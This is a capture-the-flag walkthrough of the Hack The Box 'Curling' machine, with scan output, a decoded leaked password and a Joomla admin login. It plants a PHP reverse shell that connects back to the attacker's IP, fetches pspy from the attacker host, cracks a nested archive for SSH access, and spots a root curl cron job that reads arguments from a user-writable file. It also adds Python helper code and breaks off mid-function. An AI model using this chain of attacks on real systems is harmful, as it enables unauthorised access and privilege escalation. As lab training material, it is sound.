HTB Curling

$ nmap -T4 -A -p- 10.10.10.150

Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-20 15:24 CET
Stats: 0:04:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 69.55% done; ETC: 15:31 (0:01:58 remaining)
Stats: 0:06:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 83.37% done; ETC: 15:32 (0:01:18 remaining)
Stats: 0:08:28 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 96.73% done; ETC: 15:33 (0:00:17 remaining)
Warning: 10.10.10.150 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.150
Host is up (0.063s latency).
Not shown: 65532 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp    open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
24259/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 551.88 seconds

$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.10.150 -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.150
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/11/20 15:37:47 Starting gobuster
===============================================================
http://10.10.10.150/images (Status: 301)
http://10.10.10.150/templates (Status: 301)
http://10.10.10.150/media (Status: 301)
http://10.10.10.150/modules (Status: 301)
http://10.10.10.150/bin (Status: 301)
http://10.10.10.150/plugins (Status: 301)
http://10.10.10.150/includes (Status: 301)
http://10.10.10.150/language (Status: 301)
http://10.10.10.150/components (Status: 301)
http://10.10.10.150/cache (Status: 301)
http://10.10.10.150/libraries (Status: 301)
http://10.10.10.150/tmp (Status: 301)
http://10.10.10.150/layouts (Status: 301)
http://10.10.10.150/administrator (Status: 301)
http://10.10.10.150/cli (Status: 301)
http://10.10.10.150/server-status (Status: 403)
[ERROR] 2020/11/20 16:01:39 [!] Get http://10.10.10.150/Mexico_City: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
===============================================================
2020/11/20 16:05:40 Finished
===============================================================

If we access http://10.10.10.150/administrator/, we'll find a Joomla login form.

Accessing http://10.10.10.150:

Based on the published post, the site has these users:

  • Super User
  • Floris

Looking at the page source, there is a suspicious reference to a secret.txt file:

</div>
	</footer>
</body>
      <!-- secret.txt -->
</html>

http://10.10.10.150/secret.txt

Q3VybGluZzIwMTgh

This string seems to be encoded.

Searching for «linux decode string», Google suggests base64. It is worth a quick try.

$ echo Q3VybGluZzIwMTgh | base64 --decode

Curling2018!

Now we have two possible user names and a password.
Let's try them on the Joomla admin site:

From the Joomla template editor, a PHP reverse shell can be added directly:

Using the pentestmonkey PHP reverse shell (https://github.com/pentestmonkey/php-reverse-shell):

<?php
set_time_limit (0);
$VERSION = "1.0";

$ip = '10.10.14.14';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
...

$ nc -lvnp 1234

listening on [any] 1234 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.150] 39474
Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 10:29:30 up 17:01,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

$ cd /home/floris
$ ls -la

total 44
drwxr-xr-x 6 floris floris 4096 May 22  2018 .
drwxr-xr-x 3 root   root   4096 May 22  2018 ..
lrwxrwxrwx 1 root   root      9 May 22  2018 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 floris floris 3771 Apr  4  2018 .bashrc
drwx------ 2 floris floris 4096 May 22  2018 .cache
drwx------ 3 floris floris 4096 May 22  2018 .gnupg
drwxrwxr-x 3 floris floris 4096 May 22  2018 .local
-rw-r--r-- 1 floris floris  807 Apr  4  2018 .profile
drwxr-x--- 2 root   floris 4096 May 22  2018 admin-area
-rw-r--r-- 1 floris floris 1076 May 22  2018 password_backup
-rw-r----- 1 floris floris   33 May 22  2018 user.txt

We don't have permission to read user.txt, but password_backup is readable by everyone.

$ cat password_backup

00000000: 425a 6839 3141 5926 5359 819b bb48 0000  BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34  ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960  N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000   ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800  ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034  ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0  i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78  .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931  .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22  .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290  ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503  .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843  7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c  .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090  .G.. .U@r..rE8P.
000000f0: 819b bb48                                ...H
$

It is a binary file shown as a hex dump; according to the file signature (BZh9, visible in the ASCII column), it is a bzip2 file.

Using CyberChef:

After several decompression steps we obtain:

Password = 5d<wdCbdZu)|hChXll
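The password_backup dump above is xxd output of a nested archive, and CyberChef peels the layers interactively. As an added example (not from the original post), the Python below does the same offline: it parses an xxd-style dump, identifies each layer by its magic bytes (bzip2, gzip, xz, tar) and strips them in turn, which also covers container types beyond whatever this box used; it builds its own constructed sample (password.txt inside tar, then bzip2, gzip, bzip2), so the layer order and the secret are assumptions, not the box's.

```python
import bz2
import gzip
import io
import lzma
import re
import tarfile
from typing import List, Optional, Tuple


def parse_xxd(dump: str) -> bytes:
    """Recover raw bytes from an xxd-style dump (offset: hex words  ascii column)."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        rest = line.split(":", 1)[1].strip()
        hexarea = rest.partition("  ")[0]  # the ASCII column starts after two spaces
        out += bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", hexarea))
    return bytes(out)


def identify(data: bytes) -> Optional[str]:
    """Name the container from its magic bytes, or None for plain data."""
    if data.startswith(b"BZh"):
        return "bzip2"
    if data.startswith(b"\x1f\x8b"):
        return "gzip"
    if data.startswith(b"\xfd7zXZ\x00"):
        return "xz"
    if len(data) > 262 and data[257:262] == b"ustar":  # POSIX/GNU tar header magic
        return "tar"
    return None


def peel(data: bytes, max_layers: int = 16) -> Tuple[List[str], bytes]:
    """Strip nested layers until no known container is left; return (layers, payload)."""
    layers: List[str] = []
    while len(layers) < max_layers:
        kind = identify(data)
        if kind is None:
            break
        layers.append(kind)
        if kind == "bzip2":
            data = bz2.decompress(data)
        elif kind == "gzip":
            data = gzip.decompress(data)
        elif kind == "xz":
            data = lzma.decompress(data)
        else:  # tar: take the first regular file member
            with tarfile.open(fileobj=io.BytesIO(data)) as tf:
                member = next(m for m in tf.getmembers() if m.isfile())
                data = tf.extractfile(member).read()
    return layers, data


def to_xxd(data: bytes) -> str:
    """Render bytes the way xxd does, so the parser can be exercised offline."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        words = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {words:<39}  {text}")
    return "\n".join(lines)


def build_sample(secret: bytes) -> str:
    """Constructed sample: secret in password.txt inside tar -> bzip2 -> gzip -> bzip2."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    return to_xxd(bz2.compress(gzip.compress(bz2.compress(buf.getvalue()))))


# Constructed input; the real password_backup dump from the box can be fed in the same way.
SAMPLE_DUMP = build_sample(b"Password = constructed-example-only\n")
```

Running `peel(parse_xxd(SAMPLE_DUMP))` returns the layer list and the recovered password line; pasting the box's own dump into `parse_xxd` works because the first line of that dump decodes to the `BZh9` signature the post points out.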

Now let's try the open SSH port:

user = `floris`
password = `5d<wdCbdZu)|hChXll`

$ ssh floris@10.10.10.150

floris@10.10.10.150's password: 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Nov 23 11:09:11 UTC 2020

  System load:  0.01              Processes:            174
  Usage of /:   46.4% of 9.78GB   Users logged in:      0
  Memory usage: 24%               IP address for ens33: 10.10.10.150
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

Last login: Mon May 28 17:00:48 2018 from 192.168.1.71
floris@curling:~$

floris@curling:~$ ls

admin-area  password_backup  user.txt

floris@curling:~$ cat user.txt

65ddXXXXXXXXXXXXXXXXXXXXXXXXXXXX

To get the root flag we start with pspy.

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

https://github.com/DominicBreuker/pspy

The box's architecture is x64, so we need to download pspy64:
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

floris@curling:~$ wget http://10.10.14.14:8000/pspy64

--2020-11-30 09:34:47--  http://10.10.14.14:8000/pspy64
Connecting to 10.10.14.14:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                      100%[===========================================>]   2.94M  1.44MB/s    in 2.0s    

2020-11-30 09:34:49 (1.44 MB/s) - ‘pspy64’ saved [3078592/3078592]

floris@curling:~$ ls -la

total 3052
drwxr-xr-x 6 floris floris    4096 Nov 30 09:34 .
drwxr-xr-x 3 root   root      4096 May 22  2018 ..
drwxr-x--- 2 root   floris    4096 May 22  2018 admin-area
lrwxrwxrwx 1 root   root         9 May 22  2018 .bash_history -> /dev/null
-rw-r--r-- 1 floris floris     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 floris floris    3771 Apr  4  2018 .bashrc
drwx------ 2 floris floris    4096 May 22  2018 .cache
drwx------ 3 floris floris    4096 May 22  2018 .gnupg
drwxrwxr-x 3 floris floris    4096 May 22  2018 .local
-rw-r--r-- 1 floris floris    1076 May 22  2018 password_backup
-rw-r--r-- 1 floris floris     807 Apr  4  2018 .profile
-rw-rw-r-- 1 floris floris 3078592 Nov 30 09:24 pspy64
-rw-r----- 1 floris floris      33 May 22  2018 user.txt

floris@curling:~$ chmod +x pspy64
floris@curling:~$ ./pspy64

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855          

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)                                                                                                     
Draining file system events due to startup...                                                                   
done                                                                                                            
                                                       
2020/11/30 09:38:35 CMD: UID=0    PID=84     |                                                                  
2020/11/30 09:38:35 CMD: UID=101  PID=835    | /lib/systemd/systemd-resolved                                    
2020/11/30 09:38:35 CMD: UID=100  PID=818    | /lib/systemd/systemd-networkd                                    
2020/11/30 09:38:35 CMD: UID=0    PID=8      | 
2020/11/30 09:38:35 CMD: UID=0    PID=7      | 
2020/11/30 09:38:35 CMD: UID=62583 PID=615    | /lib/systemd/systemd-timesyncd 
2020/11/30 09:38:35 CMD: UID=0    PID=6      | 
2020/11/30 09:38:35 CMD: UID=0    PID=550    | 
2020/11/30 09:38:35 CMD: UID=0    PID=509    | /lib/systemd/systemd-udevd 
2020/11/30 09:38:35 CMD: UID=0    PID=504    | /sbin/lvmetad -f 
2020/11/30 09:38:35 CMD: UID=0    PID=493    | 
2020/11/30 09:38:35 CMD: UID=0    PID=487    | 
2020/11/30 09:38:35 CMD: UID=0    PID=486    | 
2020/11/30 09:38:35 CMD: UID=0    PID=484    | /lib/systemd/systemd-journald 
2020/11/30 09:38:35 CMD: UID=0    PID=476    | /usr/bin/vmtoolsd 
2020/11/30 09:38:35 CMD: UID=0    PID=42     | 
2020/11/30 09:38:35 CMD: UID=0    PID=242    | 
2020/11/30 09:38:35 CMD: UID=1000 PID=2414   | ./pspy64 
2020/11/30 09:38:35 CMD: UID=0    PID=241    | 
2020/11/30 09:38:35 CMD: UID=0    PID=237    | 
2020/11/30 09:38:35 CMD: UID=1000 PID=2363   | -bash 
2020/11/30 09:38:35 CMD: UID=1000 PID=2362   | sshd: floris@pts/0   
2020/11/30 09:38:35 CMD: UID=0    PID=236    | 
2020/11/30 09:38:35 CMD: UID=0    PID=230    | 
2020/11/30 09:38:35 CMD: UID=0    PID=229    | 
2020/11/30 09:38:35 CMD: UID=1000 PID=2287   | (sd-pam) 
2020/11/30 09:38:35 CMD: UID=1000 PID=2286   | /lib/systemd/systemd --user 
2020/11/30 09:38:35 CMD: UID=0    PID=228    | 
2020/11/30 09:38:35 CMD: UID=0    PID=2277   | sshd: floris [priv]  
2020/11/30 09:38:35 CMD: UID=0    PID=2276   | 
2020/11/30 09:38:35 CMD: UID=0    PID=18     | 
2020/11/30 09:38:35 CMD: UID=33   PID=1776   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1774   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1772   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1771   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1770   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1769   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1768   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1767   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=0    PID=176    | 
2020/11/30 09:38:35 CMD: UID=0    PID=173    | 
2020/11/30 09:38:35 CMD: UID=0    PID=16     | 
2020/11/30 09:38:35 CMD: UID=0    PID=15     | 
2020/11/30 09:38:35 CMD: UID=0    PID=14     | 
2020/11/30 09:38:35 CMD: UID=33   PID=1365   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=33   PID=1360   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=0    PID=1340   | /usr/sbin/apache2 -k start 
2020/11/30 09:38:35 CMD: UID=0    PID=13     | 
2020/11/30 09:38:35 CMD: UID=111  PID=1272   | /usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid 
2020/11/30 09:38:35 CMD: UID=0    PID=1230   | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2020/11/30 09:38:35 CMD: UID=0    PID=121    | 
2020/11/30 09:38:35 CMD: UID=0    PID=12     | 
2020/11/30 09:38:35 CMD: UID=0    PID=1176   | /usr/lib/policykit-1/polkitd --no-debug 
2020/11/30 09:38:35 CMD: UID=0    PID=1162   | /usr/sbin/sshd -D 
2020/11/30 09:38:35 CMD: UID=0    PID=1142   | /sbin/iscsid 
2020/11/30 09:38:35 CMD: UID=0    PID=1138   | /sbin/iscsid 
2020/11/30 09:38:35 CMD: UID=0    PID=1100   | /usr/lib/snapd/snapd 
2020/11/30 09:38:35 CMD: UID=0    PID=11     | 
2020/11/30 09:38:35 CMD: UID=0    PID=1091   | /usr/sbin/irqbalance --foreground 
2020/11/30 09:38:35 CMD: UID=0    PID=1089   | /usr/sbin/cron -f 
2020/11/30 09:38:35 CMD: UID=103  PID=1057   | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                        
2020/11/30 09:38:35 CMD: UID=0    PID=1056   | /lib/systemd/systemd-logind 
2020/11/30 09:38:35 CMD: UID=0    PID=1055   | /usr/bin/python3 /usr/bin/networkd-dispatcher 
2020/11/30 09:38:35 CMD: UID=0    PID=104    | 
2020/11/30 09:38:35 CMD: UID=0    PID=1036   | /usr/sbin/atd -f 
2020/11/30 09:38:35 CMD: UID=102  PID=1028   | /usr/sbin/rsyslogd -n 
2020/11/30 09:38:35 CMD: UID=0    PID=1023   | /usr/bin/lxcfs /var/lib/lxcfs/ 
2020/11/30 09:38:35 CMD: UID=0    PID=1018   | /usr/bin/VGAuthService 
2020/11/30 09:38:35 CMD: UID=0    PID=1014   | /usr/lib/accountsservice/accounts-daemon 
2020/11/30 09:38:35 CMD: UID=0    PID=10     | 
2020/11/30 09:38:35 CMD: UID=0    PID=1      | /sbin/init maybe-ubiquity 
2020/11/30 09:39:01 CMD: UID=0    PID=2441   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                                          
2020/11/30 09:39:01 CMD: UID=0    PID=2440   | sleep 1 
2020/11/30 09:39:01 CMD: UID=0    PID=2439   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                               
2020/11/30 09:39:01 CMD: UID=0    PID=2438   | 
2020/11/30 09:39:01 CMD: UID=0    PID=2437   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                                                                                        
2020/11/30 09:39:01 CMD: UID=0    PID=2436   | /usr/sbin/CRON -f 
2020/11/30 09:39:01 CMD: UID=0    PID=2435   | /usr/sbin/CRON -f 
2020/11/30 09:39:01 CMD: UID=0    PID=2434   | /usr/sbin/CRON -f
2020/11/30 09:39:09 CMD: UID=0    PID=2443   | (ionclean) 
2020/11/30 09:39:09 CMD: UID=0    PID=2453   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2452   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2451   | /bin/sh /usr/sbin/phpquery -V 
2020/11/30 09:39:09 CMD: UID=0    PID=2450   | sort -rn -t: -k2,2 
2020/11/30 09:39:09 CMD: UID=0    PID=2449   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2468   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2467   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2466   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2465   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2464   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2463   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2462   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2461   | /lib/systemd/systemd-udevd 
2020/11/30 09:39:09 CMD: UID=0    PID=2460   | php7.2 -c /etc/php/7.2/apache2/php.ini -d error_reporting='~E_ALL' -r foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";                             
2020/11/30 09:39:09 CMD: UID=0    PID=2469   | 
2020/11/30 09:39:09 CMD: UID=0    PID=2472   | sed -ne s/^session\.save_handler=\(.*\)$/\1/p 
2020/11/30 09:39:09 CMD: UID=0    PID=2470   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2481   | 
2020/11/30 09:39:09 CMD: UID=0    PID=2479   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2482   | php7.2 -c /etc/php/7.2/cli/php.ini -d error_reporting='~E_ALL' -r foreach(ini_get_all("session") as $k => $v) echo "$k=".$v["local_value"]."\n";                                 
2020/11/30 09:39:09 CMD: UID=0    PID=2485   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2483   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=???  PID=2486   | ???
2020/11/30 09:39:09 CMD: UID=0    PID=2491   | sed -ne s/^session\.gc_maxlifetime=\(.*\)$/\1/p 
2020/11/30 09:39:09 CMD: UID=0    PID=2490   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2489   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2493   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2492   | /bin/sh -e /usr/lib/php/sessionclean 
2020/11/30 09:39:09 CMD: UID=0    PID=2495   | pidof apache2 php7.2 
2020/11/30 09:39:09 CMD: UID=0    PID=2497   | find /proc/1774/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=0    PID=2498   | find /proc/1772/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=0    PID=2499   | find /proc/1771/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=???  PID=2500   | ???
2020/11/30 09:39:09 CMD: UID=0    PID=2501   | find /proc/1769/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=0    PID=2502   | 
2020/11/30 09:39:09 CMD: UID=0    PID=2503   | find /proc/1767/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=0    PID=2504   | find /proc/1365/fd -ignore_readdir_race -lname /var/lib/php/sessions/sess_* -exec touch -c {} ;                                                                                  
2020/11/30 09:39:09 CMD: UID=0    PID=2507   | find -O3 /var/lib/php/sessions/ -ignore_readdir_race -depth -mindepth 1 -name sess_* -type f -cmin +24 -delete                                                                   
2020/11/30 09:39:09 CMD: UID=0    PID=2513   | 
2020/11/30 09:39:09 CMD: UID=0    PID=2510   | 
2020/11/30 09:40:01 CMD: UID=0    PID=2527   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                                          
2020/11/30 09:40:01 CMD: UID=0    PID=2526   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                                                                                        
2020/11/30 09:40:01 CMD: UID=0    PID=2525   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                               
2020/11/30 09:40:01 CMD: UID=0    PID=2523   | /usr/sbin/CRON -f 
2020/11/30 09:40:01 CMD: UID=0    PID=2522   | /usr/sbin/CRON -f 
2020/11/30 09:40:01 CMD: UID=0    PID=2528   | sleep 1 
2020/11/30 09:41:01 CMD: UID=0    PID=2533   | sleep 1 
2020/11/30 09:41:01 CMD: UID=0    PID=2532   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                                                                                        
2020/11/30 09:41:01 CMD: UID=0    PID=2531   | /usr/sbin/CRON -f 
2020/11/30 09:41:01 CMD: UID=0    PID=2530   | /usr/sbin/CRON -f 
2020/11/30 09:41:01 CMD: UID=0    PID=2535   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                               
2020/11/30 09:41:01 CMD: UID=0    PID=2534   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                               
2020/11/30 09:42:01 CMD: UID=0    PID=2541   | sleep 1 
2020/11/30 09:42:01 CMD: UID=0    PID=2540   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                               
2020/11/30 09:42:01 CMD: UID=0    PID=2539   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input                                                                                                        
2020/11/30 09:42:01 CMD: UID=0    PID=2538   | /usr/sbin/CRON -f 
2020/11/30 09:42:01 CMD: UID=0    PID=2537   | /usr/sbin/CRON -f 
2020/11/30 09:42:01 CMD: UID=0    PID=2542   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report                                                                                                          
2020/11/30 09:42:02 CMD: UID=0    PID=2543   | cat /root/default.txt 

We have some suspicious entries here:

...
2020/11/30 09:39:01 CMD: UID=0    PID=2441   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:39:01 CMD: UID=0    PID=2439   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:39:01 CMD: UID=0    PID=2437   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:40:01 CMD: UID=0    PID=2527   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:40:01 CMD: UID=0    PID=2526   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:40:01 CMD: UID=0    PID=2525   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:41:01 CMD: UID=0    PID=2532   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:41:01 CMD: UID=0    PID=2535   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:41:01 CMD: UID=0    PID=2534   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:01 CMD: UID=0    PID=2540   | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2020/11/30 09:42:01 CMD: UID=0    PID=2539   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2020/11/30 09:42:01 CMD: UID=0    PID=2542   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
...

This entry is executed repeatedly by root:

/bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

It appears to be run from a cron job (every minute, right after root refreshes the input file from /root/default.txt).

The entry runs curl with the -K and -o options:

-K, --config <file>: Specify a text file to read curl arguments from.
-o, --output <file>: Write output to <file> instead of stdout.

So curl reads its arguments from the input file and writes the result to the report file. Since input is group-writable by floris, we can choose which arguments root's curl runs with.
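The weakness is a root cron job that takes its curl arguments from a file the floris group can write. As an added example (not from the original post), here is a small Python audit that parses pspy-style lines, unwraps the /bin/sh -c wrapper, and flags root-run curl invocations whose -K/--config file is writable by a non-root owner, a non-root group or the world; the file table and event lines are constructed to mirror the listing and pspy output above, plus one hypothetical hardened job (/etc/report-job.cfg) for contrast.

```python
import re
import shlex
import stat
from typing import Dict, List, Tuple

# Constructed file table standing in for os.stat(): path -> (owner, group, mode).
# The first two entries mirror the admin-area listing above (root:floris, 0660);
# the last one is a hypothetical root-owned config added for contrast.
FILES: Dict[str, Tuple[str, str, int]] = {
    "/home/floris/admin-area/input": ("root", "floris", 0o660),
    "/home/floris/admin-area/report": ("root", "floris", 0o660),
    "/root/default.txt": ("root", "root", 0o600),
    "/etc/report-job.cfg": ("root", "root", 0o644),
}

# Constructed pspy-style lines modeled on the output above; the last one is a
# hypothetical job reading the root-owned config and must not be flagged.
EVENTS = [
    "2020/11/30 09:39:01 CMD: UID=0    PID=2436   | /usr/sbin/CRON -f",
    "2020/11/30 09:39:01 CMD: UID=0    PID=2437   | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input",
    "2020/11/30 09:39:01 CMD: UID=0    PID=2441   | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report",
    "2020/11/30 09:39:01 CMD: UID=1000 PID=2414   | ./pspy64",
    "2020/11/30 09:40:01 CMD: UID=0    PID=2600   | curl -K /etc/report-job.cfg -o /var/tmp/report",
]

PSPY_RE = re.compile(r"^\S+\s+\S+\s+CMD:\s+UID=(\d+)\s+PID=\d+\s+\|\s*(.*)$")


def writable_by_nonroot(owner: str, group: str, mode: int) -> bool:
    """True if someone other than root can modify the file."""
    if owner != "root" or mode & stat.S_IWOTH:
        return True
    return group != "root" and bool(mode & stat.S_IWGRP)


def config_inputs(cmdline: str) -> List[str]:
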